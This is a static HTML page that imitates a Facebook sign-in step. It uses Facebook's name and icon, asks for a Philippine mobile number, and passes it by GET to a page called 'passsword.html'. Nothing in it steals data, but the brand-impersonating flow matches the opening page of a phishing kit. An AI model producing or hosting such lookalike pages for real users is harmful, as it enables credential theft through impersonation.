<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="https://img.icons8.com/fluency/2x/facebook-new.png">
    <title>Facebook</title>
    <style>
* {text-align: center;
    font-family: Arial, Helvetica, sans-serif;
}
.up input{padding-top:3px;
    padding-bottom: 3px;
    padding-left:  1px;
    padding-right: 1;
 

}
.up h5{ color: gray;
}
#jab {background-color: #166FE5;
        border:none;
        color:white;
        margin:2px 530px;
         padding-top:5px;
         padding-bottom: 5px;
        display: block;
        padding-right: 150px;
        padding-left:130px;
        border-radius:4px;
        cursor: pointer;
        text-align: center;

}
 #gab{background-color:none;
border:1px solid gray;
background-color: white;
padding-left: 70px;
padding-right:100px ;
 margin:2px 530px;
 padding-top:3px;
 padding-bottom:3px;
width:310px;
cursor: pointer;

 }
    </style>
</head>
<body>
  <div class="up">
    <h4>What's Your Mobile number?</h4>
    <form action="passsword.html" method="get">
        <label for="number"></label>
      <input type=" number" id="number" name="number"  value="PH ^ +63 " placeholder="Enter your mobile number"required >
      <h5>You'll use this number when you login in and if you ever need<br>to reset your password.</h5>
     <button id="jab" formaction="passsword.html">Next</button><br>
     <button id="gab" formaction="">Use your email adress</button>
   </form>
  </div>
</body>
</html>